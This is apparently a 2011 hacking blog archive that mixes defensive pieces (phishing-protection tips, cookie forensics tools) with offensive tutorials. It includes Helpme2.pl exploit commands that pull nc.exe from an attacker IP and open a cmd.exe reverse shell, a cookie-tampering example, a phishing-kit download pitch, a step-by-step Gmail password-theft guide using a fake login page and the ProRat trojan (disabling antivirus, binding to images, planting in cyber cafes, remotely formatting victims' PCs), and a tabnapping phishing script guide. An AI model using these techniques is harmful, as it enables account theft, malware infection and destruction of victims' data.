Web Vulnerability and Ethical Hacking- All about Information Security ! ! !: 2011

Get the HACK out of here!

The more i think of Hacking, the more i'm convinced that nothing is Secure in this world. From your computer systems to the cell phone on which you just text-ed, everything system can fall down to one simple vulnerability or loop hole, which was left in your gadget box by it's developer. The only way to secure your information is by not turning on your gizmo.
Hacking is not a matter of chance, it is actually a lot of hard work done by a destructive mind. Well then what exactly do we mean by Ethical Hacking? The answer to this is simple, the hacking done in Ethics. But most of the people are confused by this sentence. All they ask me is how could Hacking be done in an Ethical way? Guys hacking is never ethical, its just the intention with which it is done. If the intention is positive, then it's penetration testing, done in a supervised manner, to avoid malicious Hacking. But, if the intentions are negative, then its malicious hacking. But being a hacker, i know this thing that nobody in my field has a white collar.
People using software for hacking or extracting information out of a person's computer are not really hackers. That could be done by anybody, by just downloading any of the freely and easily available softwares on the internet. These people are "script kiddies", who either are attention seekers or just have some small malicious intents. India doesn't have a very strong background in hacking, as their haven't been much of these "Hackers" . But here we are still struggling to make a job out of this.

Regards,
Ishan Chandra
[http://about.me/ishaanchandra]

Cracking Wireless Networks: How to Crack WEP or WPA Secured Networks

The video shows to how crack WEP- or WPA-secured networks. It also shows how to prevent people from cracking your wireless network(s)

---Do you want to share you views?? Just leave a comment here. you can also drop an email on ishanchandra@ymail.com

Free Download WiFi Slax Wireless Hacking Live CD v3.1 + Plug-ins,Updated

WEP is an encryption scheme based on the RC-4 cipher that is available on all 802.11a b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key which is usually a total of 64 or 128 bits long.

A semi-random 24 bit number called an Initialization Vector (IV) is part of the key so a 64 bit WEP key actually contains only 40 bits of strong encryption while a 128 bit key has 104. The IV is placed in encrypted frames header and is transmitted in plain text.

Traditionally cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets* a process that could take hours or even days depending on the volume of traffic passing over the wireless network. After enough packets were captured a WEP cracking program such as Aircrack would be used to find the WEP key.

Basic Directions:
1)Boot from CD

2)Get the WEP Key

3)Write it down

4)Reboot into Windows

5)Connect using WEP Key.

Boost Your Wi-Fi Signals With Beer Cans

I love a good hack, especially one that requires me to throw back a cold one before hand (or during). This simple wifi boost has actually been shown to increase signal strength by at least 2 to 4 bars. And, well, I will drink to that.

These instructions came to us via The Chive and we think they are most definitely worth checking out. But here is the most important question: what kind of beer will you use?

For this project you are going to need scissors, a utility knife, some adhesive putty and an empty beer can. More than one empty beer can is acceptable but don’t kid yourself, the router only needs the one.

The first step is to wash out your empty beer can, unless of course said beer is a can of Pabst Blue Ribbon. If it is PBR, promptly go drink a better beer. You really should be ashamed of yourself.

Once the can has dried, you will want to remove it’s pull tab.

Only perform this next step if you have not been drinking. Using the utility knife, saw off the bottom of the can. Chances are your can will not have a red dotted line. If you see one, put down the knife…you’ve had too much beer.

You’ll notice in the above step that the can’s pull tab has returned. Clearly, there are only two possible reasons for this. One, you are really drunk and you never removed the tab in the first place. Or–the more likely answer–beer cans can regenerate themselves.

It’s the home stretch! You just need to attach your modded beer can to the wifi router. Hopefully no other parts of the can have actually grown back. You now have beer-fi!

So, what kind of beer did you use?

XSS - Cross Site Scripting Cheat Sheet

XSS - Cross Site Scripting Cheat Sheet By Ishan

Note for you people: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Click here for XSS (Cross Site Scripting) CHEAT SHEET

XSS Cheat Sheet by Valentin

Here you find my custom XSS and CSRF cheat sheet. I know that there are many good cheat sheets out there, but since some of them are offline from time to time, I decided to create a little collection of useful XSS stuff. I added some stuff from other well known cheat sheets (e.g. from http://ha.ckers.org/xss.html) , please scroll down to see a complete list of sources.

There XSS codes can be used to test your own website for XSS/CSRF vulnerabilities. Some of them even can be used to bypass various XSS/CSRF filters. I did not include any details or explanations since I assume you are experienced with this type of vulnerability and know what you are doing.

CLICK HERE for XSS Cheat Sheet by Valentin

What is Cookie ?

Persistent vs. Non-Persistent

Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.

Secure vs. Non-Secure

Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Cookies can be set using two main methods, HTTP headers and JavaScript. JavaScript is becoming a popular way to set and read cookies as some proxies will filter cookies set as part of an HTTP response header. Cookies enable a server and browser to pass information among themselves between sessions. Remembering HTTP is stateless, this may simply be between requests for documents in a same session or even when a user requests an image embedded in a page. It is rather like a server stamping a client and saying show this to me next time you come in. Cookies cannot be shared (read or written) across DNS domains.

In correct client operation Domain A can't read Domain B's cookies, but there have been much vulnerability in popular web clients which have allowed exactly this. Under HTTP the server responds to a request with an extra header. This header tells the client to add this information to the client's cookies file or store the information in RAM. After this, all requests to that URL from the browser will include the cookie information as an extra header in the request.

Cookie Structure

domain: The website domain that created and that can read the variable.

flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.

path: The path attribute supplies a URL range for which the cookie is valid. If path is set to /reference, the cookie will be sent for URLs in /reference as well as sub-directories such as/reference/web protocols. A pathname of "/" indicates that the cookie will be used for all URLs at the site from which the cookie originated.

secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.

expiration: The time that the variable will expire on. Omitting the expiration date signals to the browser to store the cookie only in memory; it will be erased when the browser is closed.

name: The name of the variable (in this case Apache).

The limit on the size of each cookie (name and value combined) is 4 kb. A maximum of 20 cookies per server or domain is allowed.

Cookies are the preferred method to maintain state in HTTP protocol. They are however also used as a convenient mechanism to store user preferences and other data including session tokens. Both persistent and non-persistent cookies, secure or insecure can be modified by the client and sent to the server with URL requests. Therefore any attacker can modify cookie content to his advantage. There is a popular misconception that non-persistent cookies cannot be modified but this is not true; tools like Winhex are freely available. SSL also only protects the cookie in transit.

The extent of cookie manipulation depends on what the cookie is used for but usually ranges from session tokens to arrays that make authorization decisions.

Example from a real world example

Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;

The attacker can simply modify the cookie to;

Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

Hacking Tool: Helpme2.pl

Helpme2.pl is an exploit code for WinHelp32.exe Remote Buffer Overrun vulnerability.
This tool generates an HTML file with a given hidden command.
When this HTML file is sent to a victim through e mail, it infects the victim's computer and executes the hidden code.

Helpme2.pl is an exploit code written to take advantage of the winhelp32.exe vulnerability. The perl script takes a command to execute (WinExec, SW_HIDE) and gives an html output file. There are two versions

HelpMe.pl was written to work with kernel32.dll version 5.0.2195.4272, while HelpMe2.pl was written to work with kernel32.dll version 5.0.2195.2778

The exploit does the following:

Executes tftp.exe-i attacker.ip.address get nc.exe c: \winnt\system32\nc.exe
Executes nc.exe attacker.ip.address 80-e cmd.exe

This code generates an HTML file with a given hidden command. When the HTML file is sent to a victim through email, it infects the victim's computer and executes the hidden code.

Hacking Tool: WindowBomb

An email sent with such html files attached will create pop-up windows until the PC's memory gets exhausted.

Window bombs are code written to cause annoying behavior on the user's computer screen. These can be such as the ones seen include:

Deadly image	A. GIF which crashes the browser on clicking.
Uncloseable window	Opens a document that utilizes the JavaScript Unload event handler to reopen the document if you try to leave or close the window.
Invincible alert dialogue	Executes a function which generates an alert dialogue and then runs the function again
Reload-o-rama	Refreshes the document from the history 1000 times/second, leaving the back and stop buttons useless.
Window spawner	Continuously opens new windows until the ram or swap space is full.
Jiggy window	Causes the window to dance around on the screen so fast that the controls cannot be reached.
Jiggy window spawner	Creates and endless stream of little dancing windows.
While loop processor hog	executes an endless loop to chew up some processor time
Recursive frames	Opens a set of recursive frames until the ram or swap space is full.
Memory bomb	Dynamically allocates ram to the browser until the ram or swap space is full.
Super memory bomb	Opens a 100K document with numerous recursive tables and ordered lists.

http://www.securityfriday.com/ToolDownload/IEen

IEEN remotely controls Internet Explorer using DCOM.
If you knew the account name and the password of a remote machine, you can remotely control the software component on it using DCOM. For example Internet Explorer is one of the soft wares that can be controlled.

IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software components to communicate directly over a network in a reliable, secure, and efficient manner. DCOM is installed on most Windows machines by default and runs without noticed by the users.

However, if an attacker knew the account name and the password of a remote machine, he can remotely control the software component on it using DCOM. For example, Internet Explorer is one of the software components that can be controlled. IE'en is a tool that can be used to remotely control Internet Explorer using DCOM.

Summary of IE'en Functionalities:

Remotely connects to or activates Internet Explorer
Captures data sent and received using Internet Explorer
Even on SSL encrypted websites (e.g. Hotmail); IE'en can capture user ID and password in plain text.
Change the web page on the remote IE window.
Make the remote IE window visible / invisible

Attacking web applications is the easiest way to compromise hosts, networks and users.
Generally nobody notices web application penetration, until serious damage has been done.
Web application vulnerability can be eliminated to a great extent ensuring proper design specifications and coding practices as well as implementing common security procedures.
Various tools help the attacker to view the source codes and scan for security holes.
The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using an encrypted session such as SSL / "secure" cookies are advocated instead of using hidden fields, which are easily manipulated by attackers.
A cross-site scripting vulnerability is caused by the failure of a web based application to validate user supplied input before returning it to the client system.
If the application accepts only expected input, then the XSS can be significantly reduced.

Regards,

Ishan Chandra

Download Free Internet Explorer Cookie Forensic Analysis Tool: GALLETA

Many important files within Microsoft Windows have structures that are undocumented. One of the principals of computer forensics is that all analysis methodologies must be well documented and repeatable, and they must have an acceptable margin of error. Currently, there are a lack of open source methods and tools that forensic analysts can rely upon to examine the data found in proprietary Microsoft files.

Many computer crime investigations require the reconstruction of a subject's Internet Explorer Cookie files. Since this analysis technique is executed regularly, we researched the structure of the data found in the cookie files. Galleta, the Spanish word meaning "cookie", was developed to examine the contents of the cookie files. The foundation of Galleta's examination methodology will be documented in an upcoming whitepaper. Galleta will parse the information in a Cookie file and output the results in a field delimited manner so that it may be imported into your favorite spreadsheet program. Galleta is built to work on multiple platforms and will execute on Windows (through Cygwin), Mac OS X, Linux, and *BSD platforms.

Usage: galleta [options]

-t Field Delimiter (TAB by default)

Example Usage:

[kjones:galleta/galleta_20030410_1/bin] kjones% ./galleta antihackertoolkit.txt > cookies.txt

Open cookies.txt as a TAB delimited file in MS Excel to further sort and filter your results

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

Learn How to collecting and analyzing cookies Using COOKIEDIGGER

CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

DOWNLOAD HERE

SOURCE: http://www.foundstone.com

What are Web Beacons OR Web Bugs?

Web beacons, also called web bugs and clear GIFs are used in combination with cookies to help people running websites to understand the behaviour of their customers. A web beacon is typically a transparent graphic image (usually 1 pixel x 1 pixel) that is placed on a site or in an email.

The use of a web beacon allows the site to record the simple actions of the user opening the page that contains the beacon. The beacon is one of the ingredients of the page, just like other images and text except it is so small and clear that it is effectively invisible. Web pages and graphical emails use presentation code that tells your computer what to do when a page is opened. While they may contain some of the text that you see on the screen at the time they typically contains a number of instructions, or tags' that then ask the website's server to send you further content (such as an image or a block of text that changes frequently). Web beacons are retrieved in the same way and the action of calling the material from another server allows the event to be counted.

When a user's browser requests information from a website in this way certain simple information can also be gathered, such as: the IP address of your computer; time the material was viewed; the type of browser that retrieved the image; and the existence of cookies previously set by that server. This is information that is available to any web server you visit. Web beacons do not give any "extra" information away. They are simply a convenient way of gathering the simplest of statistics and managing cookies.

Web beacons are typically used by a third-party to monitor the activity of a site. Turning off the browser's cookies will prevent web beacons from tracking your specific activity. The web beacon may still record an anonymous visit from your IP address, but unique information will not be recorded.

For example a company owning a network of sites may use web beacons in order to count and recognise users travelling around its network. Rather than gathering statistics and managing cookies on all their servers separately, they can use web beacons to keep them all together. Being able to recognise you enables the site owner to personalise your visit and make it more user friendly.

Why do websites use Web Beacons?

Web beacons are used by website owners to log activity on their web pages and websites. Their purpose depends on what a site wants to understand about how visitors interact with pages. To see the demonstration how web beacons work, CLICK HERE.

Cookies are bad for privacy - Is that true?

This is a myth - cookies are a friendly internet tool primarily used by the advertising and e-commerce industry to make surfing easier and quicker. They have several roles, none of which can compromise your privacy:

Protection - to ensure you are a genuine visitor and not someone else using your password.
Authenticate and speed up your identification and e-commerce transactions.
Recognise preferences e.g. remember user names and passwords for websites.
Cap the frequency of ad serving and to make sure that advertisements are rotated and not duplicated during any one visit to a site

Many websites use the services of other companies to provide the content and services on their website. These third parties may provide content or services to more than one website. If they are using cookies, in theory, they can understand what that cookie does on a number of different sites.

Protection Against Phishing Attacks: Learn How to Protect Yourself

Never click on Hyperlinks within emails, instead, copy and paste them into your browser
Use SPAM Filter Software
Use Anti-Virus Software
Use a Personal Firewall
Keep Software Updated (operating systems and web browsers)
Always look for "https://" and padlock on web sites that require personal information
Keep your computer clean from Spyware
Educate Yourself of fraudulent activity on the Internet
Check & monitor your credit report
Seek Advice - if you are unsure, ask us: scams@fraudwatchinternational.com

For more detailed explanations on phishing and how to protect yourself visit:

http://www.fraudwatchinternational.com/phishing-fraud/phishing-home/

The Fight Against Phishing: 44 Ways to Protect Yourself:

Simple, but effective…

1. Never trust strangers: The same rules you were taught as a child come into play here; DO NOT open emails that are from people you don’t know. Set your junk and spam mail filter to deliver only content from those in your address book.

2. Sidestep those links: What happens if your spam filter is fooled into delivering junk mail to your inbox, and you happen to open it? Simple – NEVER click on links embedded in your email.

3. Guard your privacy: Your mouse just happened to move over the link and lo and behold, you’re transported to another website where you’re asked to provide sensitive information like user names, account numbers, password and credit card and social security numbers. Just one word for you - DON’T.

4. Fear Not: More often than not, these phony websites come with threats or warnings that your account is in danger of being deactivated if you don’t confirm your user information, or that the IRS is due to pay you a visit if you don’t comply with what’s written on the page. Just IGNORE them.

5. Pick up the phone and call: If you are in doubt that it just may be a legitimate request, and that your bank is actually asking you to reveal sensitive information online, CALL your customer service representative before you do anything foolhardy.

6. Use the keypad, not the mouse: TYPE in URLs instead of clicking on links to online shopping and banking sites that typically ask for credit card and account numbers.

7. Look for the lock: Valid sites that use encryption to securely transfer sensitive information are characterized by a lock on the bottom right of your browser window, NOT your web page. They also have addresses that begin with https:// rather than the usual http://.

8. Spot the difference: Sometimes, just the presence of the lock alone is proof enough that the site is authentic. To verify its genuineness, double-click the lock to display the site’s security certificate, and CHECK if the name on the certificate and the address bar match. If they don’t you’re on a problem site, so get the hell out of there.

9. Second time right: If you’re worried that you’ve reached a phishing site that’s masquerading as your banking page, sometimes the easiest way to check is to enter a WRONG password. The fake site will accept it, and then you’re usually redirected to a page that says they’re having technical difficulties, so could you please check back later? Your original banking site will not allow you entry.

10. Different is the keyword here: Use DIFFERENT passwords for different sites; I know it’s a tough ask these days when most functions of the brain are being passed on to technology, but this is a good way to prevent phishers from getting at all your sensitive transactions, even if they’ve managed to compromise one.

Income Tax Phishing Site- Beware

The above is one of the mails you may receive in your mail box which will redirect you to the below page..BEWARE…

In the Tax Refund Online Form – all fields were compulsory to be filled – like card number, bank account details, Credit card CVV number & ATM PIN etc

See the web address of FAKE SITE (PHISHING SITE)

This is the Official website Income Tax Deaprtment of India, see the difference

NEVER EVER GIVE YOUR DEBIT / CREDIT CARD CVV / CVV2 and EXPIRY DATE TO ANYONE, NOT EVEN TO THE BANK OR A GOVERNMENT OFFICIAL NEITHER ON PHONE OR ONLINE FORM or IN ANY FORM

Beware of Phishing sites. It can cost you all your money.

Download Login Spoofer 2010: Hack Yahoo Account Passwords: Facebook Passwords Hacking

Download Login Spoofer 2010: Yahoo Password Hacking: Hotmail Password Hacking: Gmail Password Hacking: Facebook Password Hacking & Many more..!!

Login Spoofer is a Software that it can create Professional Phishing Pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more ....) to Steal somebody's Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database So you go to the software (Login spoofer) and press refresh then you'll find His Username & Password & IP & his OS Info...etc. Using and Downloading is free 100%.

Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.
Hotmail Password Hacking: Hack Hotmail Account Password with phishing attack.
Gmail Password Hacking: Hack Gmail Account Password with phishing attack.
GameZer Password Hacking: Hack GameZer Account Password with phishing attack.
Facebook Password Hacking: Hack Facebook Account Password with phishing attack..& many more..!!

Download Login Spoofer 2010: DOWNLOAD HERE

Hack Gmail: How to Hack Gmail Account Password Using PRORAT Trojan & Phishing Attack

How to Hack Gmail Account Password

Note: This below mentioned methods are used to Hack Gmail Account Password. These methods can also be used to hack any other email account. I have just demonstrated it on how to hack Gmail Account Password.

You can also check how to hack a PC or remote system using Trojan & Backdoor

METHOD-1: How to Hack Gmail Account Passwords Using Phishing Attack

Step 1: Download Gmail fake login page and extract the contents into a folder. Visit here to download GMAIL FAKE PAGE

Step 2: Create your free account at www.t35.com, www.110mb.com or www.ripway.com and upload the extract files here.

Step 3: I have uploaded all files at t35.com. Simply upload all the extracted files here.

Step 4: Open you fake page, enter user name and password and try out whether its working. You fake page will be located at http://yoursitename.t35.com/Gmail.htm

Step 5: A password file will be created in the same directory and you can check it at http://yoursitename.t35.com/GmailPasswords.htm.

Now you are ready to hack Gmail accounts password. If you face any problem, post your comments here.

How hack Facebook accounts passwords - click here
How hack Twitter accounts passwords - click here

This post is for educational purpose only. www.freehacking.net holds no responsibility how you are using the downloaded files.

METHOD-2: How to Hack Gmail Account Passwords Using Trojans & Keyloggers

Here I am demonstrating using PRORAT trojan. You can also check the list of trojans & Keyloggers here which I have already posted few months back. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. I strictly recommend you to try these trojans & keyloggers on some testing system first.

Step-1: Download latest version of ProRat v1.9 Fix2. CLICK HERE to download. The ZipPass is : pro

STEP-2: Creating the ProRat server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP-3: Open Notifications. Select second option "Mail Notification". In the E-MAIL field you will see a mail id: bomberman@yahoo.com. Remove this mail ID and give your own mail id here. You will receive a notification email on this email id whenever you victim will be connected to internet from the infected system.

STEP-4: Open General settings. This tab is the most important tab. In the check boxes. here is a quick overview of what they mean and which should be checked.

Key:

[ ] = dont check
[x] = check

[ ] Give a Fake Error Message. (when they open the file, it gives an error message.
[x] Melt server on install. (this will cause the server to ALWAYS connect to the internet when the victim gets online)
[x] Kill AV - FW on Install. (this causes the anti-virus and firewalls to SHUT DOWN and stay off once installed on the victim's computer.
[x] Disable Windows XP SP2 security center
[x] Disable Windows XP Firewall
[x] Clear Windows XP Restore Points
[ ] Dont send LAN notifications ( keeps other computers on the victim's network from knowing about you )
[ ] Protection for removing local server

In the Invisibility Box, check all 4 boxes.

STEP-5: Open Bind With File. You can bind your server\downloader server with a file that you want. You must click on the ''Bind the server with a file'' button and then the file button will be activated. You can choose a file to be binded with the server now. A good suggestion is a picture because that is a small file and its easer to send to the people you need.

STEP-6: Open Server Extensions. I prefer using .exe files, because it is cryptable. Mostly crypters don't support .bat/.pif/.com etc. So use .exe files.

STEP-7: Open Server Icon. You can select the one you want to use with the server from the small pictures on the menu. You can use an icon from your computer also. Press the "Choose new icon" button.

STEP-8: After this, press "Create server", your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture.

[NOTE: PLS DO NOT OPEN THE FILE "binded_server" on your system.]

STEP-9: Sending this file "binded_server" to victim. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file.

From EMAIL, you can not send this file as it is because it will be detected as TROJAN OR VIRUS. Password protect this file with ZIP and then email it. Once your victime download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

STEP-10: Connecting to the victim's computer. Once the server has been sent and the person has opened this ZIP folder, they will now be infected with it. AND HAVE NO CLUE ABOUT IT!. On the top of the ProRat program you will see a box in the upper left corner. Type in the victim's IP address and make sure the port is 5110. Now
press Connect. You should now see a pop-up box wanting to know a password. Remember the password you entered while creating the server? that is what you need to type. By default, it is "123456" without quotes.

STEP-11: Check your email, (junk in needed), and find the “Your victim is online”. Copy and paste the IP address onto ProRat where it says “IP:[127.0.0.1]“. Press CONNECT, DO NOT CHANGE THE PORT, if u did change it back to 5110. Type in the password (default is usually 123456, it is in the email). Your done, now you can mess with the buttons on the program. Especially the GIVE DAMAGE button. It will damage their pc by format, and will make the computer useless.

FAQ:

Q: Error message:Windows cannot access the specified deice, path, or file. You may not have the appropriate permissions to access the item. What do I do?
A: Simple! Delete the ProRat program. Delete it. What happen was, your AV has altered the file. OR it could be m
alacious content. Either way, delete it. NEXT, remember the file you downladed? Un extract the file again and re run. You will not need to remake a server file and such if it has been sent to the victim. Just open ProRat and make sure your AV is shut off. Reconnect. There ya go.

Q: What operating systems are supported by ProRat?
A: Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista

Q: When I have downloaded ProRat, my antivirus detect it as virus. What should I do?
A: Well, since RATs are hacktools, and all the hack tools are detected as viruses, ProRat is detected as virus also. To download and install ProRat you will need to turn off your anti-virus.

Q: What should I do after I install my server?
A: After you install your server, you should spread it. Few years back I have installed my server manually on 1000's of cyber cafe in my city. I hacked almost the entire city cafe users secret information. This is the best way. Go to nearest cyber cafe's and manually install your trojan server.

Q: I've created a server, but I don't see it in the directory. Why?
A: That's caused by your antivirus. The server is detected, and it won't let it. I suggest you to remove your antivirus if you are going to use RATs.

Q: I've send my server to a friend on MSN, but he doesn't connect.
A: That's because he has an antivirus or firewall and it won't let him to connect in your RAT. To make it FUD(Fully Undetectable), you should use a crypter.

Q: Is ProRat illegal?
A: No. ProRat is a legal RAT. The author of ProRat created his program for legitimate purposes. For example, there are many legal activities. Parents can use keyloggers to protect their children from online abuse etc. Some people use it for stealing passwords, credit cards and more but it's not a software which breaks the law, but the person who uses it.

Q: Can ProRat be used for legitimate purposes?
A: Yes. You can monitor your children online activity.. to make sure they don't visit pornographic websites. You can find out if someone uses your computer while you are away, ensure no one is accessing your personal files while you are away and more.

Q: How do I make my server FUD?
A: You should use a binder or crypter. Also check the below links how to make trojan or keylogger fully undetectable from antivirus.
Wrappers

How to bypass antivirus

Phishing Attack With Phishing Kit | Hackers New Creativity With Phishing Attacks

Phishing Attack With Phishing Kit | Hackers New Creativity With Phishing Attacks

A new attack has been uncovered using a phishing kit that has an indestructible infrastructure due to its residence in the cloud.

In the majority of phishing schemes when the main server is taken down the main collection point is also removed, but with this kit the data collection space is hosted separately from the phishing websites, Imperva discovered.

Once a server is taken out, all hackers need to do with the cloud-based kit is to re-post the web front end in a new location.

Imperva explained this case is also interesting for its provenance and operation.

Created by two “master hackers”, the phishing kit was posted on hacker forums. Those who used the kit then became part of the master hackers’ “army”, meaning all the data they acquired went back to the creators, who did not have to put in the hours implementing the attack.

The masters’ underlings did not know a thing about their leaders’ activities either and, depending on the country, the kit’s creators will not have broken the law as they just wrote the software.

And as each of the subsidiary hackers has their own campaign, taking down numerous domains will not affect other schemes that report back to the master hackers.

One of the overlords claimed their kit has been downloaded 200,000 times, Imperva said, but this could be an exaggeration, according to the security company’s chief technology officer Amichai Shulman.

"To some extent this is malware-as-a-service," Shulman told IT PRO, adding that the attack shows how hackers will abuse technologies people are widely using - in this case the cloud.

“This is definitely showing a shift from the normal models that we have seen so far regarding phishing,” Shulman said.

It appears hackers are getting creative with phishing attacks.

Tabnapping Attack Tutorial: Phishing Attack Tutorial

Tabnapping Attack Tutorial: Phishing Attack Tutorial

Tabnapping - Phishing in mulitabbed environment of browsers

This is my first post in this blog, a great opportunity for me to write in this blog. My first post is on a simple hacking trick which is phishing but in a new way. This new way of phishing is known as Tab Napping. The basic steps are same as traditional phishing attack. Phishing is the most popular and widely used method for hacking email accounts. Phishing is not as easy as it's name. Creating a phishing page is an easy task and any one can download it from various hacking forums for free. The main step of phishing comes after creation of fake login page.

How to send this fake page to the victim??

Here comes the Tab Napping which can make your second step easy than before. No need to send fake page via email to victim.

Tab Napping use the modern browser's multi tabbed environment. Now a days all people use multiple tabs for accessing Gmail, facebook, orkut and other websites simultaneously. The trick is to confuse user in his/her multiple tabs and redirect any of idle ta of his browser to your phishing silently. Tab Napping works on the user's assumption that a tabbed web page stays the same when other Internet services are being accessed.

The idea behind this is very simple and is done by javascript. Tab napping is all about the relation of 2 pages. suppose Page A and Page B. Victim was viewing page A in a tab of a browser and then left this idle and and now using some other website in another tab of browser. If the user will not return to page A for some pre-specified time, page A will automatically redirect to Page B. This Page B is your phishing page. This redirection and cheking for user actions is done by Javascript. You can download it for given link.

Make a web page and use the tab napping script in that page say it page A. This script will not affect the layout or content of the page. This script will check for user actions. If the page is idle for some time, this script will redirect this page to a pre-specified page which may be your phishing page. You have to specify this page in the script. Be sure to change this in script.
check script for this line...

timerRedirect = setInterval("location.href='http://www.gmail.com'",10000);

this line will redirect to Gmail after 10 sec. Change this location to the address of your phishing page. This line is used 2 times in the script so change is both lines.

so page A with tab napping script will redirect to phishing page B.

Now send the link of the page A to your victim. This is a normal page. If the page is idle for some time it will be changed to page B otherwise no effect.

Download Here:

http://www.ziddu.com/download/12640258/tabbednapping.rar.html